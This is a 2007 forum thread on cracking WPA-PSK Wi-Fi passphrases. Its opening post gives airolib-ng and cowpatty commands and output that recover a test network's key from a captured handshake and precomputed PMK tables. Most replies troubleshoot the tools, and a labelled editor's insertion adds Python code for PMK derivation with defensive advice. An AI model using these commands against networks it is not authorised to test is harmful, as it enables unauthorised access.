Remote Exploit Forums

#1 shamanvirtuel, 07-21-2007, 06:24 AM
Airolib-ng and cowpatty

It's not really a tut, but some hints to help those who want to speed things up when attacking WPA.

I assume you have a WPA handshake capture in cap format (airodump + deauth).

We are working on a network with ESSID test.

I assume you already have airolib-ng (1.0 dev), have initialized a database, given it a large password file (mine is 172000+ passwords), and have precomputed it if you have added some ESSIDs.

The trick is to add the ESSID to the db, precompute the keys with airolib-ng, and export the PMKs for this ESSID.

airolib-ng DB2 stats (where DB2 is my database)
statsThere are 2 ESSIDs and 172747 passwords in the database. 345494 out of 345494 possible combinations have been computed (100%).

ESSID Priority Done
Livebox-a5a3 64 100.0
test 64 100.0

Hopefully I already have "test" as an ESSID in my db; if not, I add it to the db and recompute the table: 172000 passwords = 172000 PMKs to generate for an ESSID (approx. 30 min).

I now export it in cowpatty (genpmk) format
(where DB2 is the database, "test" the ESSID to export, testpmk the PMK output file)
airolib-ng DB2 export cowpatty "test" testpmk
exportExporting...
Done.

Now we test the PMK against the ESSID.
testpmk is the exported file from airolib-ng, "test" the ESSID, -v verbose, -r ...wpa.cap the handshake capture
cowpatty -d testpmk -s "test" -v -r /pentest/wireless/aircrack-ng/test/wpa.cap
cowpatty 4.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 10000: arrojadite
key no. 20000: calligraphical
key no. 30000: contestation
key no. 40000: dislocatory
key no. 50000: femineity
key no. 60000: hemadromometer
key no. 70000: interlimitation
key no. 80000: marquisotte
key no. 90000: nonannulment
key no. 100000: pancreatotomy
key no. 110000: pontificality
key no. 120000: raspingly
key no. 130000: semiflashproof
key no. 140000: subdecuple
key no. 150000: trancedly
key no. 160000: unimportance
key no. 170000: weightlessness

The PSK is "biscotte".

172747 passphrases tested in 2.71 seconds: 63642.26 passphrases/second

Yep, you've done it....
I like the conjunction of cowpatty + an SQL database of precomputed keys....really nice.....just need time (less and less....) and a HUGE password file....

Just a little example of what can be done with these nice tools.....

#2 -=Xploitz=-, 07-27-2007, 08:32 PM

You must have a fast processor Shaman...cause I got almost 500,000 passwords and this is my output after 18 minutes!!!>>>

{-=Xploitz=-} ~ # airolib-ng testdb batch
Computed 50000 PMK in 1067 seconds (46 PMK/s, 200000 in buffer).



And in another tab.....


{-=Xploitz=-} ~ # airolib-ng testdb stats
statsThere are 1 ESSIDs and 472992 passwords in the database. 50000 out of 472992 possible combinations have been computed (10.571%).

ESSID Priority Done
Xploitz Network 64 10.57

only 10%!!!!
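
Editor's added example (not written by any poster in this thread): why the table must be recomputed for every ESSID and what the batch step costs. The WPA-PSK PMK is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt, so a table built for "test" says nothing about a network with a different name. Function names are this example's own; the passphrase, ESSIDs and rate figures are the ones quoted in posts #1 and #2.

```python
import hashlib
import time

def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 salted with the ESSID."""
    pw, salt = passphrase.encode(), essid.encode()
    if not 8 <= len(pw) <= 63:
        raise ValueError("passphrase must be 8..63 characters")
    if not 1 <= len(salt) <= 32:
        raise ValueError("ESSID must be 1..32 bytes")
    # 4096 iterations, 256-bit output, as fixed by the WPA-PSK key derivation.
    return hashlib.pbkdf2_hmac("sha1", pw, salt, 4096, 32)

def local_rate(samples: int = 20) -> float:
    """Measure how many PMKs per second this machine derives (single thread)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"constructed-{i:04d}", "test")  # constructed sample passphrases
    return samples / (time.perf_counter() - start)

def precompute_seconds(passwords: int, essids: int, pmk_per_second: float) -> float:
    """One PMK per (password, ESSID) pair; nothing carries over between ESSIDs."""
    return passwords * essids / pmk_per_second

if __name__ == "__main__":
    # Same passphrase, two network names: the salt makes the PMKs unrelated.
    for essid in ("test", "Livebox-a5a3"):
        print(f"{essid:14s} {wpa_pmk('biscotte', essid).hex()}")
    # Figures from post #2: 50000 PMKs in 1067 s, 472992 passwords, 1 ESSID.
    rate = 50000 / 1067
    hours = precompute_seconds(472992, 1, rate) / 3600
    print(f"thread rate {rate:.1f} PMK/s -> {hours:.1f} h for the full table")
    print(f"this machine: {local_rate():.0f} PMK/s")
```

The defensive reading: a unique, non-default ESSID forces this cost to be paid again for that one network, and a long random passphrase that appears in no wordlist is not in the table at all.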

#3 shamanvirtuel, 07-27-2007, 09:53 PM

Well, you do need to precompute the whole table.

When you precompute it you can gain 3x on verifying PMKs.... but you need to have your table precomputed......

Don't you remember prez's thread on time-memory....
It was with a TL50 Core 2 Duo.... (not a fast one....)

2 GB of RAM (maybe that helps)

#4 -=Xploitz=-, 07-27-2007, 10:16 PM

Yeah..I'm having some MAJOR issues with that thread, balding_parrot, and Funnyman as well. Take a look...we need major help with cowpatty.


Code:
http://forums.remote-exploit.org/showthread.php?p=36325#post36325

#5 -=Xploitz=-, 07-28-2007, 01:40 AM

So many problems with this as well...geesh. What steps did you take to make the databases? Cause I went to the aircrack-ng main site..and TRIED to follow their tutorial..but after I run the

airolib-ng testdb batch
Computed 4292 PMK in 102 seconds (42 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

I ^C to exit..and try your

airolib-ng testdb stats
statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

ESSID Priority Done
64 100.0
Xploitz 64 100.0

Cool so far right??

Now I do your airolib-ng testdb export cowpatty "Xploitz" testpmk

exportThere is no such ESSID in the database or there are no PMKs for it.


What gives???

#6 -=Xploitz=-, 07-28-2007, 01:48 AM

Here's a complete list of EVERYTHING I did in order.....


{-=Xploitz=-} ~ # airolib-ng testdb init

Now I make a ssidlist.txt and put ONLY Xploitz inside it and save

{-=Xploitz=-} ~ # airolib-ng testdb import ascii essid ssidlist.txt
importReading...
Writing...
Done.
{-=Xploitz=-} ~ # airolib-ng testdb import ascii passwd algae.txt
importReading...
Writing... read, 411 invalid lines ignored.
Done.
{-=Xploitz=-} ~ # airolib-ng testdb batch
Computed 4292 PMK in 75 seconds (57 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

{-=Xploitz=-} ~ # airolib-ng testdb stats
statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

Where in the hell is this 2nd ESSID?? I only have 1 in it, and it's called Xploitz

ESSID Priority Done
64 100.0
Xploitz 64 100.0

{-=Xploitz=-} ~ # airolib-ng testdb export cowpatty "Xploitz" testpmk
exportThere is no such ESSID in the database or there are no PMKs for it.

So I tried it without the quotes......

{-=Xploitz=-} ~ # airolib-ng testdb export cowpatty Xploitz testpmk
exportThere is no such ESSID in the database or there are no PMKs for it.
{-=Xploitz=-} ~ # WHAT GIVES????

Last edited by -=Xploitz=-; 07-28-2007 at 01:56 AM.

#7 balding_parrot, 07-28-2007, 01:56 AM

I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
I just cannot find what it is YET

#8 -=Xploitz=-, 07-28-2007, 02:02 AM

Quote:
Originally Posted by balding_parrot
I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
I just cannot find what it is YET

Geesh..you too balding_parrot?? First "Benefits of Time-Memory Trade-Off in coWPAtty", by theprez98, gives us problems...now airolib-ng is jacking us around!!! Geesh,..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what we're missing.

#9 balding_parrot, 07-28-2007, 02:11 AM

Quote:
Originally Posted by -=Xploitz=-
Geesh..you too balding_parrot?? First "Benefits of Time-Memory Trade-Off in coWPAtty", by theprez98, gives us problems...now airolib-ng is jacking us around!!! Geesh,..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what we're missing.

There must be a connection somewhere, something so obvious.......

Not sure about it saving time..... It is certainly using up enough.....

Just think when we do get it working, with the amount of time we have spent on it, it's going to tell us the key before we even ask for it

#10 -=Xploitz=-, 07-30-2007, 08:05 PM

C'mon Shaman...what are all the steps you took from beginning to end? This damn airolib is driving me crazy!! I asked on the aircrack forums..and darkAudix said he was doing EXACTLY the same thing as me with the same dev of aircrack..and he got it to work..but mine won't!! So my other question for you Niko is...

Could it be that balding_parrot's sqlite module is at fault? Aircrack main site says You must be running version 3.3.17 or above ..and parrot's is 3.4..please help us Shaman.

All times are GMT.